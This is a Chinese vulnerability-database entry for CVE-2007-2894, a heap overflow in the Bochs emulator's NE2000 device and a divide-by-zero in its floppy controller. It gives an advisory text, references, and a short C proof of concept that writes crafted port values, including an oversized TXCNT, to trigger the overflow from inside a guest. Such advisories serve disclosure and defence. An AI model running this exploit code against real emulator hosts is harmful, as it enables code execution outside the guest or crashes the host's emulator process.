Bochs NE2000 RX帧堆溢出及软盘控制器拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113066 漏洞类型 边界条件错误
发布时间 2007-05-31 更新时间 2007-06-12
CVE编号 CVE-2007-2894 CNNVD-ID CNNVD-200705-514
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/30110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-514
|漏洞详情
Bochs是用C++编写的开源可移植IA-32(x86)PC模拟器。Bochs模拟器的实现上存在多个漏洞,远程或本地攻击者可能利用此漏洞控制用户机器。Bochs的模拟NE2000设备没有检查TXCNT寄存器中的值是否大于设备中可用的内存,这可能导致堆溢出,允许攻击者以Bochs进程的权限执行任意指令。但成功攻击要求攻击者有权限控制TXCNT寄存器。此外Bochs的模拟软盘控制器还可能将0做为除数,导致Bochs进程崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/24246/info

Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation.

A local attacker can exploit these issues to execute arbitrary code in the context of the affected application or to cause denial-of-service conditions. Failed exploit attempts of the buffer-overflow vulnerability will also result in denial-of-service conditions. 

#include <sys/io.h>

       int main(int argc, char **argv) {
       iopl(3);
       outw(0x5292, 0x24c);
       outw(0xffff, 0x245);(a)
       outw(0x1ffb, 0x24e);
       outb(0x76, 0x241);
       outb(0x7b, 0x240);
       outw(0x79c4, 0x247);
       outw(0x59e6, 0x240);
       return 0;
                     }

(a) <- TXCNT is inserted here.
|参考资料

来源:VUPEN
名称:ADV-2007-1936
链接:http://www.frsirt.com/english/advisories/2007/1936
来源:OSVDB
名称:42119
链接:http://osvdb.org/42119
来源:XF
名称:bochs-floppy-disk-dos(34513)
链接:http://xforce.iss.net/xforce/xfdb/34513
来源:BID
名称:24246
链接:http://www.securityfocus.com/bid/24246
来源:MISC
链接:http://taviso.decsystem.org/virtsec.pdf
来源:GENTOO
名称:GLSA-200711-21
链接:http://security.gentoo.org/glsa/glsa-200711-21.xml
来源:SECUNIA
名称:27715
链接:http://secunia.com/advisories/27715
来源:SECUNIA
名称:25470
链接:http://secunia.com/advisories/25470
来源:bugs.gentoo.org
链接:http://bugs.gentoo.org/show_bug.cgi?id=188148